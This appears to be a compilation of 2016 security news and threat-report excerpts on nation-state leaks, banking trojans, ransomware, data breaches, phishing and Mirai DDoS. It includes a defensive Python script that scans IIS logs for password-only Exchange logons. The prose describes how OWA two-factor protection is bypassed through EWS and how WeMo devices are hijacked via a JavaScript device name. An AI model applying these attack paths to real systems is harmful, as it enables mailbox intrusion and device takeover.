The one-off use of unique elements, such as control servers, encryption keys and more, in addition to the adoption of cutting-edge techniques from other major threat groups, is new. The only effective way to withstand such threats is to deploy multiple layers of security, with sensors to monitor for even the slightest anomaly in organizational workflow, combined with threat intelligence and forensic analysis. You can find further discussion of the methods available to deal with such threats here.


In August, a person or group going under the name ‘ShadowBrokers’ claimed to possess files belonging to the Equation group. They provided links to two PGP encrypted archives. They provided the password to the first for free, but ‘auctioned’ the second, setting the price at 1 million BTC (1/15th of the bitcoins in circulation).

Having uncovered the Equation group in February 2015, we were interested in examining the first archive. It contains almost 300MB of firewall exploits, tools and scripts, under cryptonyms such as BANANAUSURPER, BLATSTING and BUZZDIRECTION. Most of the files are at least three years old, with change entries pointing to August 2013 and the newest time-stamp dating to October 2013.


The Equation group makes extensive use of RC5 and RC6 encryption algorithms (these algorithms were designed by Ronald Rivest in 1994 and 1998 respectively). The free trove provided by ShadowBrokers includes 347 different instances of RC5 and RC6 implementations. The implementation is functionally identical with that found in the Equation malware – and has not been seen elsewhere.


The code similarity makes us believe with a high degree of confidence that the tools from the ShadowBrokers leak are related to the malware from the Equation group.

Operation Ghoul

In June, we noticed a wave of spear-phishing e-mails with malicious attachments. The messages, sent mainly to top and middle level managers of numerous companies, appeared to be coming from a bank in the UAE. The messages claimed to offer payment advice from the bank and included an attached SWIFT document. But the archive really contained malware. Further investigation revealed that the June attacks were the most recent operation of a group that researchers had been tracking for more than a year, named Operation Ghoul by Kaspersky Lab.

The group successfully attacked more than 130 organizations from 30 countries, including Spain, Pakistan, UAE, India, Egypt, the United Kingdom, Germany and Saudi Arabia. Based on information obtained from the sink-hole of some C2 servers, the majority of the target organizations work in the industrial and engineering sectors. Others include shipping, pharmaceutical, manufacturing, trading and educational organizations.


The malware used by the Operation Ghoul group is based on the commercial spyware kit Hawkeye, sold openly on the Dark Web. Once installed, the malware collects interesting data from the victim’s computer, including keystrokes, clipboard data, FTP server credentials, account data from browsers, messaging clients, e-mail clients and information about installed applications. This data is sent to the group’s C2 servers.

The aim of the campaign seems to be financial profit – all the targeted organizations hold valuable data that can be sold on the black market.

The continued success of social engineering as a way of gaining a foothold in target organizations highlights the need for businesses to make staff awareness and education a central component of their security strategy.

Malware stories


In June 2016 we reported on the Lurk banking Trojan, used to systematically siphon money from the accounts of commercial organizations in Russia – among them, a number of banks. The police estimate the losses caused by this Trojan at around $45 million.

During our research into this Trojan, it became apparent that victims of Lurk had also installed the remote administration software Ammyy Admin. While we didn’t give it much thought at first, it became apparent that the official Ammyy Admin website had been compromised and was being used by the Lurk gang as part of a watering-hole attack: the Trojan was downloaded to victims’ computers along with the legitimate software.


The dropper on the Ammyy Admin site started distributing a different Trojan on 1 June 2016, ‘Trojan-PSW.Win32.Fareit’: this was the day that the alleged creators of the Lurk Trojan were arrested. It seems that those responsible for the Ammyy Admin website breach were happy to sell their Trojan dropper to anyone who wanted to distribute malware from the compromised site.

The banking Trojan wasn’t the only cybercriminal activity the Lurk group was involved in. The group also developed the Angler exploit kit, a set of malicious programs designed to exploit vulnerabilities in widespread software to install malware. This exploit kit was originally developed to provide a reliable and effective delivery channel for the group’s malware. However, in 2013 the group started to rent out the kit to anyone who was willing to pay for it – probably to help pay for the group’s huge network infrastructure and large number of ‘staff’. The Angler exploit kit became one of the most powerful tools available on the criminal underground. Unlike the Lurk banking Trojan, which focused on victims in Russia, Angler has been used by attackers across the world – including the groups behind the CryptXXX and TeslaCrypt ransomware and the Neverquest banking Trojan (the latter was used against almost 100 banks). The operations of Angler were disrupted after the arrest of the alleged members of the Lurk group.

In Q3 2016, 45.2M unique malicious URLs were recognized by @kaspersky web antivirus components #KLreport #IT

The group was involved in other side activities too. For more than five years, the group moved from developing very powerful malware for automated money theft with Remote Banking Services software, to sophisticated theft involving SIM-card swap fraud, to becoming hacking specialists familiar with the internal infrastructure of banks.

Kaspersky Lab provided assistance to the Russian police in the investigation into the group behind the Lurk Trojan. The arrests marked the culmination of a six-year investigation by our Computer Incidents Investigation Team. You can read about the investigation here.


Hardly a month goes by without reports of ransomware attacks in the media: for example, a recent report suggested that 28 NHS trusts in the UK have fallen victim to ransomware in the last 12 months. Most ransomware attacks are directed at consumers, but a significant proportion target businesses (around 13 per cent in 2015-16). The Kaspersky Lab IT Security Risks Survey 2016 indicated that around 42 per cent of small and medium businesses became victims of ransomware in the 12 months up to August 2016.

One recent ransomware campaign demanded a massive two bitcoins (around $1,300) as a ransom. The ransomware program, named Ded Cryptor, changes the wallpaper on the victim’s computer to a picture of an evil-looking Santa Claus.


The modus operandi of this program (i.e. encrypted files, scary image, and ransom demand) is unremarkable, but the pre-history of this attack is interesting. It is based on the EDA2 open-source ransomware code, developed by Utku Sen as part of a failed experiment. Utku Sen, a security expert from Turkey, created a ransomware program and published the code online. He realized that cybercriminals would use the code to create their own cryptors, but hoped that this would help security researchers to understand how cybercriminals think and code, thereby making their own efforts to block ransomware more effective.

Ded Cryptor was just one of many ransomware programs spawned by EDA2. Another such program that we saw recently was Fantom. This was interesting not just because of its connection to EDA2, but because it simulates a genuine-looking Windows update screen.


This is displayed while Fantom is encrypting the victim’s files in the background. The fake update program runs in full-screen mode, visually blocking access to other programs and distracting the victim from what’s really happening. Once the encryption has been completed, Fantom displays a more typical message.


There’s no doubt that public awareness of the problem is growing, but it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalising on this – this is clearly reflected in the growing number of ransomware attacks.

It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk. In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data. It’s never advisable to pay the ransom.

In Q3 2016, @kaspersky web #antivirus detected 12,657,673 unique malicious objects #KLreport #netsec

If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask your anti-malware vendor if they can help and check the No More Ransom website, to see if it holds the keys to decrypt your data. This is a joint initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky Lab and Intel Security – designed to help victims of ransomware retrieve their encrypted data without paying cybercriminals.

In a recent ‘ask the expert‘ session, Jornt van der Wiel, an expert from Kaspersky Lab’s Global Research and Analysis Team, provided useful insights into ransomware.

Data breaches

Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media. This quarter has been no exception, with data leaks from the official forum of DotA 2, Yahoo and others.

Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves. Any organization that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. As an alternative, people can use a password manager application to handle all this for them automatically.

It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

Given the potential impact of a security breach, it’s hardly surprising to see regulatory authorities paying closer attention to the issue. The UK Information Commissioner’s Office (ICO) recently issued a record fine of £400,000 to Talk Talk for the company’s ‘failure to implement the most basic cyber security measures’, related to the attack on the company in October 2015. In the view of the ICO, the record fine ‘acts as a warning to others that cyber security is not an IT issue, it is a boardroom issue’.

The EU General Data Protection Regulation (GDPR), which comes into force in May 2018, will require companies to notify the regulator of data breaches, with significant fines for failure to secure personal data. You can find an overview of the regulation here.

We took a look back at the impact of the Ashley Madison breach, one year after the attack that led to the leak of customer data, offering some good tips to anyone who might be considering looking online for love (and good advice for managing any online account).

Cisco data leak – Job applications portal leaked personal information

7.11.2016 securityaffairs Incident

Cisco data leak – Cisco has fixed a security vulnerability in the company Professional Careers portal that exposed personal information of the users.
Cisco has fixed a security vulnerability in the company’s Professional Careers portal that may have leaked personal information. Cisco notified the affected users by e-mail, clarifying that only a “limited set of job application related information” was leaked from the mobile version of the website.

What happened?

According to the security advisory sent by Cisco to its users, the data leakage was the result of an “incorrect security setting” applied after system maintenance on a third-party site.

The leaked data includes name, username, password, email, address, phone number, answers to security questions, education and professional profile, cover letter and resume text, and other personal information.

The incorrect configuration exposed data from August 2015 to September 2015, and again from July 2016 to August 2016. The issue was discovered by an unnamed researcher who ethically reported it to the company.

“An independent security researcher discovered that a limited set of job application related information from the Cisco Professional Careers mobile website was accessible. Cisco’s investigation found this to be the result of an incorrect security setting following system maintenance.” reads the security note. “The issue was immediately fixed and passwords to the site have been disabled. Because Cisco takes its responsibility to protect information seriously, and since many people use the same passwords on multiple websites, we wanted to alert you to this incident. As a precaution, users of Cisco’s Professional Careers Website will need to reset their passwords at their next login by clicking “forgot my password”.”

Cisco confirmed that, at the time it fixed the issue, it had found no evidence of unauthorized access to its systems; however, it did discover an unexplained connection to the server.

“We do not believe that the information was accessed by anyone beyond the researcher who found and reported the issue. However, there was an instance of unexplained, anomalous connection to the server during that time, so we are taking precautionary steps.” states Cisco.

In response to the incident, Cisco reset the passwords of Cisco Professional Careers Website users as a precaution.

“Upon learning this, the setting was immediately corrected and user passwords to the site were reset. Because Cisco takes its responsibility to protect information seriously, and since many people use the same passwords on multiple websites, we wanted to alert you. As a precaution, as a user of the Cisco Professional Careers Website, you will need to reset your password at their next login by clicking “forgot my password”,” reads the Notice of Data Breach of the Cisco data leak.


The exposed data could be used for social engineering attacks against the users. Cisco offered free 90-day fraud alerts on their accounts to the affected users.


The biggest cyber threats in the Czech Republic

7.11.2016 Novinky/Bezpečnost Viruses
Danger, Nemucod and Fraud. These are the names of three computer viruses that domestic users should watch out for. Over the past month they were by far the most widespread infections in the Czech Republic. This follows from the regular monthly statistics of the most widespread threats compiled by the antivirus company Eset.
As in September, the most frequently mentioned threat in October was the malicious code Danger, which spreads mostly via unsolicited e-mails. According to Eset, it was responsible for every third attack last month.

Danger is a fairly effective weapon for computer pirates. They use this uninvited guest to secretly open a back door into someone else’s operating system, through which they can then smuggle further malicious code onto the infected machine.

Most often it spreads extortion viruses known collectively as ransomware. Attacks by these pests almost always follow the same script. First they start encrypting the contents of the computer and show the user a notice that they must pay to have the computer decrypted, otherwise they will supposedly never get their data back. Even after paying the ransom, users have no guarantee that they will actually regain access to their data.

The virus has to be uninstalled from the computer and the data then decrypted using a special program. In some cases, however, this is not possible.

Same tactic, different virus
The malicious code Nemucod, which took second place in the Czech virus statistics in October with a 12.32% share, works on practically the same principle. Cybercriminals can therefore use it to open a back door into the system and, at the same time, to spread further malicious code.

Third place in the list of the ten most frequently detected dangerous codes in October went to the Trojan horse PDF/Fraud. “The authors’ intention is to use this malware to persuade the user to fill in and send their sensitive personal data,” said Miroslav Dvořák, technical director of Eset.

To obtain sensitive information, computer pirates use a whole range of tricks; for example, they lure users with prizes in various fictitious competitions. Partly thanks to this, the malicious code mentioned managed to gain an almost five percent share in the statistics.

The ten most widespread virus threats in the Czech Republic – October 2016
1. JS/Danger.ScriptAttachment (35.02 %)
2. JS/TrojanDownloader.Nemucod (12.32 %)
3. PDF/Fraud (4.99 %)
4. Java/Adwind (3.58 %)
5. JS/TrojanDownloader.FakejQuery (3.03 %)
6. DOC/Fraud (2.86 %)
7. JS/Kryptik.RE (1.95 %)
8. VBA/TrojanDownloader.Agent.BUX (1.54 %)
9. PowerShell/TrojanDownloader.Agent.Q (1.46 %)
10. JS/ProxyChanger (1.31 %)
Source: Eset

Bypassing Two-Factor Authentication on Outlook Web Access
7.11.2016 securityaffairs Safety

Enterprises running Exchange Server using two-factor authentication on Outlook Web Access (OWA) could be hacked due to a design flaw.
New trouble for enterprises running Exchange Server: two-factor authentication implementations on Outlook Web Access (OWA) can be easily bypassed due to a design flaw.

An attacker can bypass two-factor authentication to access email inboxes, calendars, contacts and other sensitive data of targeted enterprises.

The weakness stems from the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA, and EWS is not covered by the two-factor authentication applied to OWA.

An attacker who holds valid credentials can therefore reach the mailboxes behind an OWA server by targeting EWS, which shares the same port as Outlook Web Access.


The design issue was disclosed last week by researcher Beau Bullock from Black Hills Information Security, who had privately reported it to Microsoft on Sept. 28.

Bullock explained that the principal problem is that Outlook Web Access and Exchange Web Services run on the same web server and are both enabled by default, a fact many enterprises overlook.

Even with 2FA enabled on OWA, EWS still offers single-factor authentication to the same infrastructure.

In his test, Bullock set up an OWA server protected by Duo for Outlook 2FA, then he targeted the EWS on the same server using a test account’s credentials.

Bullock used a tool called MailSniper that he developed for searching mailboxes for sensitive data in a Microsoft Exchange environment.

“At DerbyCon 6.0 I released a tool called MailSniper for searching mailboxes for sensitive data in a Microsoft Exchange environment. MailSniper utilizes Exchange Web Services (EWS) when connecting to an Exchange server to retrieve messages from a user’s inbox. EWS is a web-based API enabled on Exchange servers that Microsoft recommends customers use when developing client applications that need to interface with Exchange.” Bullock wrote in a blog post.

Below is a video PoC published by the expert:

In summary, Bullock demonstrated that the lack of 2FA on Exchange Web Services allows an attacker who has obtained a user’s credentials to read that user’s mailbox, despite the 2FA protecting Outlook Web Access on the same server.

“In conclusion, it appears that Outlook portals that are being protected by two-factor authentication might not be covering all of the authentication protocols to Microsoft Exchange. In this post it was demonstrated that Exchange Web Services is not being protected by a popular two-factor authentication software, and it was possible to still read emails of a user after only obtaining their login credentials. Exchange has other services that might have a similar problem such as MAPI over HTTP, and Autodiscover. I tested against one third-party 2FA software, and Microsoft’s own Azure Multi-Factor authentication but I’d imagine others likely have the same problem.” concluded Bullock.
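The gap Bullock describes also leaves a trace on the defender’s side: every EWS, MAPI-over-HTTP or Autodiscover logon is written to the IIS logs of the Exchange front end, whether or not OWA has 2FA in front of it. The following Python script is an added example (not part of the article, of Bullock’s post or of MailSniper) that reads constructed IIS W3C log lines and flags successful authentications to those single-factor endpoints from addresses outside an assumed internal range, so an administrator can see password-only mailbox access that an OWA-only 2FA deployment never challenges. The log layout, internal ranges, user agents and sample lines are all assumptions.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Set

# Constructed IIS W3C log excerpt from an Exchange front end (sample data, not a real capture).
# The #Fields header declares the column order; the script reads the columns by name.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status cs(User-Agent)
2016-11-07 09:12:01 10.0.5.23 CORP\\alice POST /EWS/Exchange.asmx 200 Microsoft+Office/16.0
2016-11-07 09:12:07 10.0.5.23 CORP\\alice POST /owa/auth.owa 302 Mozilla/5.0
2016-11-07 09:14:44 203.0.113.42 CORP\\bob POST /EWS/Exchange.asmx 401 -
2016-11-07 09:14:45 203.0.113.42 CORP\\bob POST /EWS/Exchange.asmx 200 ExchangeServicesClient/0.0.0.0
2016-11-07 09:15:02 198.51.100.9 CORP\\carol GET /owa/ 200 Mozilla/5.0
2016-11-07 09:16:30 198.51.100.9 CORP\\carol POST /EWS/Exchange.asmx 200 Microsoft+Office/16.0
2016-11-07 09:20:11 203.0.113.42 CORP\\bob POST /mapi/emsmdb/ 200 ExchangeServicesClient/0.0.0.0
"""

# Assumption: these are the organisation's internal networks; any other source is "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Exchange virtual directories that still accept a bare username/password when 2FA is applied
# to OWA alone: EWS (the one Bullock demonstrated) plus the two he names as likely siblings.
SINGLE_FACTOR_PREFIXES = ("/ews/", "/mapi/", "/autodiscover/")


@dataclass(frozen=True)
class Finding:
    user: str
    client_ip: str
    endpoint: str
    user_agent: str


def is_internal(ip: str) -> bool:
    """True when the client address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_w3c(text: str) -> List[dict]:
    """Parse IIS W3C lines into dicts keyed by the names given in the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        # IIS replaces spaces inside field values (e.g. the User-Agent) with '+',
        # so a plain whitespace split yields exactly one token per declared field.
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # skip lines that do not match the declared layout
        rows.append(dict(zip(fields, values)))
    return rows


def single_factor_external_logons(text: str) -> List[Finding]:
    """Return successful (HTTP 200) requests to single-factor Exchange endpoints from external IPs.

    A 401 is the normal first leg of an NTLM/Basic challenge and is ignored; only the
    authenticated 200 shows that the credentials were accepted with no second factor.
    """
    findings = []
    for row in parse_w3c(text):
        stem = row["cs-uri-stem"].lower()
        if row["sc-status"] != "200" or not stem.startswith(SINGLE_FACTOR_PREFIXES):
            continue
        if row["cs-username"] == "-" or is_internal(row["c-ip"]):
            continue
        findings.append(Finding(row["cs-username"], row["c-ip"],
                                row["cs-uri-stem"], row["cs(User-Agent)"]))
    return findings


def users_never_seen_on_owa(text: str) -> Set[str]:
    """Users who reached a single-factor endpoint from outside but never touched OWA.

    These accounts never passed the 2FA prompt at all, which is exactly the
    pattern a tool that speaks only EWS would leave behind.
    """
    owa_users = {r["cs-username"] for r in parse_w3c(text)
                 if r["cs-uri-stem"].lower().startswith("/owa/")}
    return {f.user for f in single_factor_external_logons(text)} - owa_users


if __name__ == "__main__":
    for f in single_factor_external_logons(SAMPLE_LOG):
        print(f"{f.user} from {f.client_ip} -> {f.endpoint} ({f.user_agent})")
    print("external single-factor users never seen on OWA:", users_never_seen_on_owa(SAMPLE_LOG))
```

The user agent is kept in each finding because an Outlook client from a travelling employee and a scripted EWS client both reach the same unprotected endpoint; the point of the check is that neither was asked for a second factor.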

Databases of Indian embassies leaked online. Too easy to hack them

6.11.2016 securityaffairs Security

The databases of the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya were leaked online by two grey hat hackers.
Today I was contacted by a security pentester who goes online by the moniker Kapustkiy, who revealed to me that he had breached the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya. Kapustkiy and his friend Kasimierz (@Kasimierz_) told me that they were white hats in the past, but decided to become grey hats to get media attention and force many website administrators to seriously consider cyber security.

The duo exploited SQL injection flaws in the targeted websites and gained access to the databases. They confirmed to me that many Indian embassies are vulnerable to this kind of attack.
They breached a total of 7 databases containing names, surnames, email addresses and telephone numbers.

The duo leaked online the content of the hacked databases. The data are available on Pastebin at the following URL

Unfortunately, such data leaks are very dangerous, especially for the security of diplomatic personnel. We cannot forget that the personnel working in embassies are privileged targets of nation-state actors conducting cyber espionage campaigns.

In May, security experts from Palo Alto Networks collected evidence that Operation Ke3chang, discovered by FireEye in 2013, is still ongoing. Back in 2013, the security researchers at FireEye spotted a group of China-linked hackers conducting an espionage campaign against foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang,’ and in March the same hacking crew was spotted targeting personnel at Indian embassies across the world.

Operation Ke3chang is only one of the numerous campaigns that have targeted diplomats worldwide; for this reason, it is important to ensure a proper security posture to protect the data managed by embassies across the world.

Now the data belonging to the personnel working in the Indian Embassies in the above countries is available online.

I had no opportunity to check the authenticity of the data. I tried to reach the embassy online, but at the time of writing the website of the Indian Embassy in Rome was unavailable.

How to Exploit Belkin WEMO gear to hack Android devices

6.11.2016 securityaffairs Android

Belkin’s WeMo home automation firmware that’s in use in several IoT devices has recently been found vulnerable to an SQL injection.
Belkin’s WeMo home automation firmware that’s in use in its light bulbs, switches, security cameras, coffee makers and room heaters has recently been found vulnerable to an SQL injection.

The flaw gives root privileges to a third party that already has access to the devices’ local network.

Researchers at Virginia-based Invincea Labs discovered the vulnerability and also warned of a related knock-on exploit path that allows the compromise of the Android device used to control the Belkin home automation systems.

The flaw stems from a weakness in field validation: a threat actor can inject malicious JavaScript via the device name field.

Scott Tenaglia, Research Director at Invincea stated that the flaws were previously unknown and not linked to earlier flaws in the WeMo home automation products.

Invincea Labs privately disclosed the flaws on Thursday the 11th of August with Belkin publicly announcing the vulnerability the next day.

On September 1st, Belkin released a patch that remedied the code injection vulnerability in the Android app. A further patch to fix the WeMo appliances was released by Belkin on November 1st.

It’s unknown how many WeMo products are vulnerable to this particular weakness, however, in 2015 it was reported that Belkin WeMo had approximately 1.5 million products in use.

Researchers at Invincea stated that every one of the company’s devices that allows remote control or administration is vulnerable to the attack.

In order to exploit this particular set of vulnerabilities, a malicious actor would first have to gain access to the local network where the smart devices were located. They would then have to leverage the shared network infrastructure in order to move the malicious code from their entry point to the vulnerable devices.

According to Tenaglia, “The goal of the attacker is to hop from one device – a PC that can be later disinfected – to another device that can’t be protected – such as an IoT device.” He then went on to explain, “Once the attacker has access to the IoT device they can do whatever they want from downloading Mirai-type malware for creating a botnet or just control the device in question. They can also infect or re-infect any PC on the same network with malware of their choice.”

Invincea Labs tested the concept by infecting a WeMo device with a malicious PowerShell script and, from there, opening a telnet connection on the device that supplied a root shell to anyone who connected.

Tenaglia also stated that, once infected, the device could be configured to reject attempts to patch the system or reset it to default settings, unless it had already been patched with the recently released firmware update.

Once the access had been granted the researchers found that the attack could progress to target Android devices running the WeMo app used to control the home automation devices.

“This is the first time anyone has discovered a way for IoT devices to hack your phone”, according to Tenaglia.


The vulnerability is triggered by placing unsanitized JavaScript into the device’s name field: instead of being treated purely as a string, the malicious code is executed.

“Every WeMo device can be assigned a name. What we found is you can set the name property in the device to a malicious string. The malicious string contains JavaScript code. And when the Android app requests the name of the devices it needs to connect to, it will download the malicious JavaScript code that is the name of the device, and execute the code,”

Utilizing the hack in the lab environment Tenaglia reported that they were able to both access the photo gallery on the phone as well as activate the GPS beaconing system, allowing third parties to track and locate the device.

“All this hack allows us to do is run code in the context of the WeMo app. We do not have root access to the phone,” Tenaglia said. Furthermore, access to the Android device is limited to only when the app is active or running in memory on the phone. Once the WeMo remote app is shut down, access is terminated. “What we have is an in-memory infection. The code does not persist on the phone when you force quit the app. However the name of the device is still that malicious string. So when you connect to that device again the reinfection occurs,”

More Insights On Alleged DDoS Attack Against Liberia Using Mirai Botnet
6.11.2016 thehackernews Attack
On Thursday, we compiled a story based on research published by a British security expert reporting that some cyber criminals are apparently using Mirai Botnet to conduct DDoS attacks against the telecommunication companies in Liberia, a small African country.
In his blog post, Kevin Beaumont claimed that a Liberian transit provider had confirmed to him a DDoS attack of more than 500 Gbps targeting the one undersea cable servicing Internet connectivity for the entire country.
Later, some media outlets also confirmed that the DDoS attack caused Internet outage in some parts of the country, citing ‘slow Internet’ and ‘total outage’ experienced by some local sources and citizens.
"The DDoS is killing our business. We have a challenge with the DDoS. We are hoping someone can stop it. It's killing our revenue. Our business has frequently been targeted" an employee with one Liberian mobile service provider told PC World.
Network firm Level 3 confirmed to Zack Whittaker of ZDNet that it had seen attacks on telecoms companies in Liberia making access to the web spotty. Other reports suggested mobile net access was affected too.
"At first I thought it was a problem with my internet provider, which often suffers from slow speeds. But this feels more serious. Even when you do get online, the connection repeatedly cuts out." BBC Africa's Jonathan Paye-Layleh in Liberia shared his experience.
Of course, given the high level of concern, the story went viral and Kevin’s research was covered by other media outlets, including BBC, PC World, The Guardian, Forbes, IBTimes, Quartz and Mashable, although a few of them interpreted the incident incorrectly and claimed that the attack took down the entire country’s Internet.
In our article, we explicitly mentioned multiple times that criminals are "using Mirai Botnet to shut down the Internet for an entire country" and "trying to take down the Internet of Liberia."
The only mistake in our previous article was the image caption which briefly said, "DDoS takes down entire country offline." We apologize to our readers for an incorrect image caption, which has now been corrected.
Latest Insights On Liberia DDoS Attack Story
After Kevin’s story, some new developments with more insights have appeared.
Doug Madory, the Director of Internet Analysis at Dyn Research, stated that Dyn and Internet-infrastructure company Akamai have no data that supports any nationwide Internet outage in Liberia.
The Hacker News has also been contacted by Kpetermeni Siakor, who manages infrastructure at the Liberia Internet Exchange Point, stating that only Lonestarcell MTN, one of the country's four major telecommunication companies, faced a 500 Gbps DDoS attack for a short period, and that it was mitigated successfully.
"From inspecting our logs at the Liberia IXP, we didn't see any downtime in the past three weeks. The general manager of the CCL also couldn't confirm any issues with the ACE cable," Siakor said.
In our previous article, the primary concern revolved around two facts: the Mirai Botnet’s capability and the ACE submarine fiber-optic cable’s capacity.
If just 100,000 Mirai bots were able to knock the majority of the Internet offline two weeks ago, how easy would it be for millions of bots to DDoS the ACE submarine fiber-optic cable, whose total capacity of just 5.12 Tbps is shared between all of the 23 countries it serves, including Liberia?
So, when we said that someone was trying to take the entire country down, we meant that cyber criminals have the capacity to do so, and the fact that they have targeted one network operator does not mean they would not attack other network operators, which could impact Internet services in the country.
Mirai Malware Threat: Protect Your IoT Devices
The incidents involving the Mirai malware are extremely worrying because it can take over insecure cameras, DVRs, and routers, which are widely available all around the world – thanks to lazy manufacturers and customers.
Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks.
So, the best way to protect yourself and your devices is to be more vigilant about the security of your smart devices.
In our previous article, we provided some basic, rather practical, solutions that will help you protect your IoT devices from becoming part of the Mirai botnet. You can also check for yourself whether your IoT device is vulnerable to Mirai malware.

Watch out! A new LinkedIn Phishing campaign is spreading in the wild
6.11.2016 securityaffairs Social
Experts from Heimdal Security reported a recent LinkedIn phishing campaign aiming to collect confidential information from unsuspecting users.
Phishing attacks continue to be a serious threat: crooks exploit channels such as social media platforms and mobile devices in the attempt to steal sensitive data. According to the 2015 Verizon Data Breach Investigations Report, 23% of email recipients open phishing messages and 11% click on malicious attachments … and this is just the tip of the iceberg.

Experts at Heimdal Security reported a recent LinkedIn scam aiming to collect confidential information from unsuspecting users.

The attack vector is an email like this:


Wait, LinkedIn is requesting files from me? LinkedIn is requesting to send documents via email to confirm my identity?

Unfortunately, many users fall victim to this absurd request.

The email asks for a payment receipt, so premium LinkedIn users could be tricked into sending their payment information.

Taking a close look at the sender’s email address

postmaster [@]

It is easy to notice that the message doesn’t come from the professional social media platform.

The domain used by the phishers, http : [//] , hosts an empty WordPress website, likely a compromised site used for the campaign.

The message also asks victims to upload the document to a Dropbox folder, which is alarming: no legitimate service will ask you to upload your ID document to a cloud storage platform.

“The Dropbox link is clean when scanned through VirusTotal, which shows that this recent campaign has not yet been picked up by antivirus solutions.” states the analysis published by Heimdal Security.

Another element that should raise suspicion is the time limit referred to in the email, a classic social engineering approach used to pressure victims into following the instructions in the message.

Now let’s analyze the link in the top right corner of the message: it leads to a password reset page, secured with HTTPS.

“The link is placed on the recipient’s name and leads to a password reset page, secured by HTTPS. Strangely enough, this is actually a safe page, which could prompt the email recipients to believe that the rest of the email is valid and legitimate as well.” continues the analysis.

Going further, the experts noticed many other strange issues; I invite you to take a look at the analysis. Awareness of this kind of scam is important to make it ineffective.

To report phishing messages you’ve received, please email

The US Government is ready to hack back if Russia tries to hit Presidential Election
6.11.2016 securityaffairs Cyber
Documents and testimonies collected by NBC News confirm that the US Government’s cyber army is ready to hack back if Russia tries to disrupt the Presidential Election.
The alleged interference of Russian state-sponsored hackers in the 2016 Presidential election is triggering a response from the US.

For the first time, a member of the US Presidential staff has threatened another country with a cyber attack in response to the hacking campaigns that have targeted US politicians over recent months.

The Office of the Director of National Intelligence and the Department of Homeland Security have issued a joint security statement to accuse the Russian government of a series of intrusions into the networks of US organizations and state election boards involved in the Presidential Election.

“The U.S. Intelligence Community (USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and institutions, including from US political organizations. The recent disclosures of alleged hacked e-mails on sites like and WikiLeaks and by the Guccifer 2.0 online persona are consistent with the methods and motivations of Russian-directed efforts. These thefts and disclosures are intended to interfere with the US election process” reads the statement.

“We will take action to protect our interests, including in cyberspace, and we will do so at a time and place of our choosing,” a senior administration official told AFP.

“The public should not assume that they will necessarily know what actions have been taken or what actions we will take.”

Two weeks ago, US Vice President Joe Biden explained during an interview with NBC that a “message” would be sent to Russian President Vladimir Putin over the alleged hacking.

It is a historic declaration: for the first time in a diplomatic context, a member of a government has invoked a cyber attack as a deterrent measure.

“Vice President Joe Biden told “Meet the Press” moderator Chuck Todd on Friday that “we’re sending a message” to Putin and that “it will be at the time of our choosing, and under the circumstances that will have the greatest impact.” reported the NBCnews.

“When asked if the American public will know a message was sent, the vice president replied, “Hope not.“”

According to NBC, the CIA was preparing a retaliatory cyber attack “designed to harass and ’embarrass’ the Kremlin leadership.”

While cyber security experts, politicians, and military officials are debating what a proportional response to the alleged Russian interference should be, the US cyber army has already penetrated Russia’s electric grid, telecommunications networks and command systems.

The news was confirmed by a senior intelligence official and by top-secret documents obtained by NBC News.

“U.S. military hackers have penetrated Russia’s electric grid, telecommunications networks and the Kremlin’s command systems, making them vulnerable to attack by secret American cyber weapons should the U.S. deem it necessary, according to a senior intelligence official and top-secret documents reviewed by NBC News.” reported the NBC News.

Russia, China, the US, Germany and almost every other country are improving their cyber capabilities. Security experts have introduced the concept of the militarization of cyberspace to describe the effort governments spend to establish a form of dominance by using malware and hacking tools against the critical infrastructure and computer systems of foreign governments.

The Stuxnet cyber weapon demonstrated the effectiveness of digital weaponry, alone or as an adjunct to conventional attacks.

Recently Russian hackers were accused of being responsible for a large number of espionage campaigns against governments and private companies worldwide.

Of course, the US cyber army operates in the same way in its pursuit of dominance in cyberspace: documents leaked by Snowden and examined by Der Spiegel magazine reveal that the NSA is preparing for future dominance in cyberspace.

The Equation Group is probably one of the highest expressions of the NSA’s cyber capabilities. The NSA-linked group used a large number of zero-day exploits and sophisticated hacking tools in its campaigns.

Now the documents reviewed by NBC News confirm the significant effort the US Government has spent against Russia.

US intelligence doesn’t believe the Russian hackers will target national critical infrastructure; instead, it fears Russia could disrupt the presidential election by releasing fake documents or spreading misinformation through PSYOPS campaigns.

